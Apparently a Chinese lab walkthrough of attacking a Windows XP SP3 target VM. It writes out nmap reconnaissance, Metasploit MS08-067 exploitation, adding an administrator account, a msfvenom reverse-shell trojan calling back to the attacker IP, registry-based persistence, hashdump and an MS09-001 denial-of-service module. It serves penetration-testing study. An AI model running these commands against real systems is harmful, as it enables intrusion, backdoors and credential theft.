前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >靶机:WinXPenSP3

靶机:WinXPenSP3

作者头像
小简
发布2023-01-01 15:39:56
6580
发布2023-01-01 15:39:56
举报
文章被收录于专栏:简言之简言之

WinXPenSP3靶机安装与配置

靶机下载地址:

下载链接:https://jwt1399.lanzoui.com/iv2VJde68vc

安装&配置:

1.下载好压缩包解压,导入VWware,启动WinXPenSP3,登陆密码为123456

2.打开Control Panel–>Network Connections–>右击Local Area Connection–>选择properties–>双击Internet Protocol(TCP/IP)–>勾选Obtain an IP address automatically

3.将该靶机网络适配器改为桥接模式,你的攻击机也改为桥接模式,保证他俩能正常通信

环境

1.网络环境

机器

IP

攻击机:Kali-2020

192.168.1.110

靶 机:WinXP

192.168.1.102

2.主要使用工具

工具

Version

metasploit

5.0.92

nmap

7.80

Nessus

8.10.0

目标&任务

1.探测靶机WinXPenSP3的漏洞&利用

2.利用漏洞Getshell

3.提权&持久化:增加Administrators权限用户,攻击机监听端口等待反弹shell,上传木马客服端程序,添加注册表信息,设置木马程序开机自启动等。

一、信息收集

1.探测目标

代码语言:javascript
复制
sudo arp-scan -l

获得靶机IP: 192.168.1.102

2.探测开放端口

代码语言:javascript
复制
nmap -sV -p- 192.168.1.102

开放了端口139,445,这是SMB协议使用的端口,那么后面我们可以尝试使用nmap扫描smb相关漏洞

注:SMB协议是基于TCP-NETBIOS下的,一般端口使用为139,445

3.根据开放端口进一步获取信息

尝试通过SMB 协议确定操作系统、计算机名称、域、工作组和当前时间。

代码语言:javascript
复制
sudo nmap --script=smb-os-discovery.nse 192.168.1.102

二、漏洞扫描

1.使用nmap扫描漏洞

代码语言:javascript
复制
sudo nmap --script=smb-check-vulns.nse 192.168.1.102

直接执行会报错,因为新版Nmap,smb-check-vulns.nse脚本被取消了。

它被分为smb-vuln-conficker、smb-vuln-cve2009-3103、smb-vuln-ms06-025、smb-vuln-ms07-029、smb-vuln-regsvc-dos、smb-vuln-ms08-067这六个脚本,用户根据需要选择对应的脚本。

解决方案

1.直接进行全扫描(执行上方6个脚本)

代码语言:javascript
复制
sudo nmap --script=smb-check-vulns-*.nse 192.168.1.102

2.获取smb-check-vulns.nse,放入/usr/share/nmap/scripts/【nmap存放漏洞匹配文件的目录】

smb-check-vulns.nse获取地址:https://jwt1399.lanzoui.com/iYH7Wdg2k8j

2.使用Nessus扫描漏洞

通过Nessus扫面的漏洞报告,对各个漏洞逐一利用。

三、漏洞利用&提权

MS08-067

MS08-067-漏洞利用

1)首先运行metasploit,使用search ms08-067寻找可利用的漏洞点

代码语言:javascript
复制
sudo msfdb init && msfconsole
search MS08-067

2)使用攻击模块,使用show options查看我们需要设置的参数。

代码语言:javascript
复制
use exploit/windows/smb/ms08_067_netapi

show options #可以看到RHOSTS必须设置

3)设置RHOSTS(远程IP),即靶机的ip,然后run或者exploit,成功Getshell

代码语言:javascript
复制
set RHOSTS 192.168.1.102
run 或者 exploit
shell
MS08-067-提权
添加Administrators权限用户
代码语言:javascript
复制
#添加hacker用户
net user hacker hacker /add

#添加hacker用户添加进administrators组
net localgroup administrators hacker /add

#查看用户
net user
#删除用户
net user hacker /delete  #渗透结束后再删除,擦干净屁股再走

可以看到成功添加了hacker用户

制作&上传木马
服务端

监听端口等待反弹shell。使用exploit/multi/handler模块,并设置参数之后运行。

代码语言:javascript
复制
use exploit/multi/handler     
代码语言:javascript
复制
set payload windows/meterpreter/reverse_tcp
show options

设置LHOST(本地IP,攻击机Kali的IP)和LPORT

代码语言:javascript
复制
set LHOST 192.168.1.110
set LPORT 12345   #也可以使用默认的4444端口
代码语言:javascript
复制
run 或者 exploit

这里先放着,不要关窗口,监听端口等待后面我们上传木马反弹shell

客户端

使用msfvenom构造客户端木马程序,并上传

代码语言:javascript
复制
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.110 LPORT=12345 -f exe -o jian.exe

利用上面漏洞将做好的木马植入靶机

代码语言:javascript
复制
sudo msfdb init && msfconsole
search ms08-067
use exploit/windows/smb/ms08_067_netapi
show options
set RHOSTS 192.168.1.102
Run
shell

使用upload上传木马

代码语言:javascript
复制
upload /home/kali/Desktop/jian.exe C:\\WINDOWS\\system32

可以看到jian.exe已经成功上传到靶机

在获取的shell上运行jian.exe,成功反弹shell到攻击机上【就是上面监听端口等待反弹shell的那个窗口】

设置木马开机启动

设置木马开机启动:利用注册表添加后门,先查看原开机启动的应用

代码语言:javascript
复制
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

利用注册表增加开机启动应用,添加注册表信息,设置jian.exe开机自启。

代码语言:javascript
复制
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v sys -d 'C:\WINDOWS\system32\jian.exe Ldp 443 -e cmd.exe'
其他操作

还可以通过sysinfol来查看系统信息。

使用hashdump来查看系统用户名和密码的hash值,如果密码简单,可以通过爆破hash来得到登录密码。

MS17-010(永恒之蓝)

跟上面漏洞利用差不多

成功getshell,后续操作跟前面一样

MS09-001

代码语言:javascript
复制
sudo msfdb init && msfconsole

Search MS09-001
代码语言:javascript
复制
use auxiliary/dos/windows/smb/ms09_001_write

show options

set RHOSTS 192.168.1.102

run 或者 exploit

对靶机发起了拒绝服务攻击,具体对靶机的影响暂时不知

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2020-06-03,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • WinXPenSP3靶机安装与配置
  • 环境
  • 目标&任务
  • 一、信息收集
    • 1.探测目标
      • 2.探测开放端口
        • 3.根据开放端口进一步获取信息
        • 二、漏洞扫描
          • 1.使用nmap扫描漏洞
            • 2.使用Nessus扫描漏洞
            • 三、漏洞利用&提权
              • MS08-067
                • MS08-067-漏洞利用
                • MS08-067-提权
                • 其他操作
              • MS17-010(永恒之蓝)
                • MS09-001
                相关产品与服务
                脆弱性检测服务
                脆弱性检测服务(Vulnerability detection Service,VDS)在理解客户实际需求的情况下,制定符合企业规模的漏洞扫描方案。通过漏洞扫描器对客户指定的计算机系统、网络组件、应用程序进行全面的漏洞检测服务,由腾讯云安全专家对扫描结果进行解读,为您提供专业的漏洞修复建议和指导服务,有效地降低企业资产安全风险。
                领券
                问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档